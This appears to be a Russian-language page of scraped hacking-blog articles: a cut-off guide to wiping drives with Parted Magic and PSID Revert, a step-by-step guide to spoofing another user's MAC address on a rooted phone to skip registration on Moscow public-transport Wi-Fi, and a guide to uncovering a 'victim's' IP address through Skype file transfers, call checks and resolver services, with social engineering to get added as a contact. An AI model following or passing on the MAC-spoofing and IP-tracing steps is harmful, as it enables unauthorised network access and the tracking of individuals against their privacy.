файлов этим способом. Уничтожение файлов используя Parted Magic Большое количество исследователей рекомендуют использовать этот способ. Ведь Parted Magic является дистрибутивом Linux, где можно найти все методы удаления информации и управления секторами. Данный дистрибутив является загрузочной средой Линукс, это значит, что вам необходимо установить ее на флэшку и загрузит таким образом. Вот небольшой перечень того, что вам понадобится сделать: 1. Скачать дистрибутив и создать флэшку с установочными файлами используя программу Unetbootin 2. Загружаем ПК с вашего диска и выбираем “Настройки на умолчанию” 3. Как только он будет загружен, в нижнем левом углу выбираем сначала “Служебные”, после чего нажимаем “Стереть диск”. 4. Далее выбираем “Внутреннее: безопасное стирание”, это начнет запись нулей на все сектора диска, после чего вам будет необходимо выбрать диск, на котором начнется процесс удаления файлов. 5. Если вам пришло оповещение о том, что диск был “заморожен”, то вам нужно будет перейти в спящий режим и повторить процесс позже. Если у вас будет запрошен пароль, то в строку записываем “NULL”. 6. Вам будет выведения некоторая информация, где вам нужно будет согласиться со всеми рисками, после чего информация будет уничтожена. Удаление файлов при помощи PSID Revert Бывают случаи, что на твердотельных накопителях имеется аппаратное шифрование. В таких случаях нам и понадобится PSID чтобы принять PSID Revert. Этот способ удаляет файлы криптографически, после чего сбрасывает ваш диск до заводских настроек. PSID Revert уничтожает все файлы. Также как уже говорилось, он будет полезен для тех, у кого стоит аппаратное шифрование. Узнать поддерживает ли ваш накопитель этот метод удаления диска вы сможете в интернете.
-
Наверняка, из названия статья, вы уже поняли о чем я сегодня расскажу. Итак, что же нам понадобиться? Вот перечь: Рут-права Программа “Fing – Network Tools” Программа “Change My Mac – для изменения вашего MAC адреса” Данные приложения являются бесплатными для скачивания в Плей Маркете. Начнем, вам необходимо подключиться к сети, после отклонить запрос на регистрацию в сети. Запускаем Fing, сверху находим кнопку обновления и нажимаем ее. После ожидания несколько секунд, вы узнаете подключен ли к сети еще кто-нибудь, в таком случае вы увидите не только свое устройство, но и другие, нажав на которые, вы сможете узнать их MAC-адрес и скопировать его. Как только эта операция была выполнения, нажимаем Change My MAC, соглашаемся с предоставлением рут-доступа. Вставляем раннее скопированный адрес. Собственно это все, что нам нужно было сделать. Если хотите сделать все удобнее, то создавай еще несколько профилей, между ними можно легко переключаться. Например один из профилей вы можете использовать дома, второй в отеле и так далее. Помните, что к одной сети не могут подключиться пользователи с одинаковым MAC-адресом, поэтому вам будет необходимо ждать пока другой пользователь покинет сеть, либо самому же отключиться и попробовать позже. P.S В метро Москвы Fing по каким-то непонятным причинам не обнаруживает никаких устройств, однако, в автобусах – обнаруживает, а из-за того, что для всего транспорта создана общая сеть, то мы берем MAC-адрес в автобусе, после чего идем в метро и там уже производим подключение, никакой регистрации проходить не придется. Если вы везунчик, то вы сможете найти MAC-адрес, где будет отключена реклама.
-
- обход
- регистрация
- (and 12 more)
-
Сегодня мы рассмотрим несколько методов, с помощью которых, вы сможете заполучить IP прямо из скайпа. Какую же информацию можно получить, зная IP? Страну проживанияРегион страныПочтовый индексИнтернет-провайдераИспользуя Nmap или Kali Linux можно получить и куда больше информации, но это уже совсем другая история.Перейдем к самим методам: Первый метод Для этого способа нам будет нужен Firewall или же другие специальные программы такого типа, если вы не знаете таких программ, то можете сильно не беспокоится об этом, оно вам не сильно пригодится. Однако если вы не знаете что такое Firewall, то вам вообще не пригодится эта статья. Начнем к самим действиям. Добавляем вашу жертву в друзья, если человек не хочет вас добавлять, то подключаем свои знания социальной инженерии исходя из того, какая цель перед вами стоит и исходя из того, какой является жертвой. Об этом тоже можно написать много тем, поэтому сосредоточимся конкретно на получении IP. Допустим, пользователь принял заявку в друзья, отключаем все кроме Skype, после чего производим отправку файла вашей жертву, рекомендую, чтобы файл весил более менее много, например какое-нибудь видео и вместе с этим смотрим в Файрвол, там будет указаны подключения при передачи файла на конкретный IP. Это и будет IP-адрес вашей жертвы. Это можно сделать и с помощью сниффера, однако, такой метод подойдет для более продвинутых пользователей, которые отлично разбираются в этом деле. Второй метод Устанавливаем какой-нибудь Файрвол. Запускаем. После чего, заходим в скайп, переходим к контакту, там вы сможете проверить качество связи, нажав на специальную кнопку. После нажатия, вы переходите обратно в скачанный Файрвол, а там переходите в мониторинг соединений. Если же IP не удастся там найти, то в настройках ставим галочку “Показать внешний IP” Третий метод Как показывает практика, прошлые два метода срабатывают практически всегда, однако, бывают случаи, когда опытные пользователи скрывают свои IP. Это случается редко, но такой ситуации нельзя исключать. Если вам попался такой человек, то проще всего узнать его IP с помощью специальных сервисов в интернете, которые носят названия Skype Resolver. Эти сервисы имеют массы преимуществ: Устанавливать их не нужно, они являются онлайн-сервисамиIP-адрес можно получить в любом месте, нужен только доступ в интернетМожно использовать несколько сервисов сразу, чтобы получить сто процентный результатКакие же действия нам необходимо выполнить: Первым делом, заходим в скайп и переключаемся на необходимого нам пользователя, наведя на его иконку кликаете левой кнопкой мыши. После этого копируете его логин. Если он не скопируется, то просто запишите или запомните. Все сервисы работают одинаково, поэтому зайдя на один из таких, просто вводим логин, иногда нужно решить капчу. После того, как вы ввели логин – нажимаете Submit. И вы сразу же получаете всю информацию о жертве. Если на одном сайте информации не появилось, то идите на другой. Если все сайты не сработали, то следует использовать только предыдущие методы.
-
- вычисление
- скайп
- (and 11 more)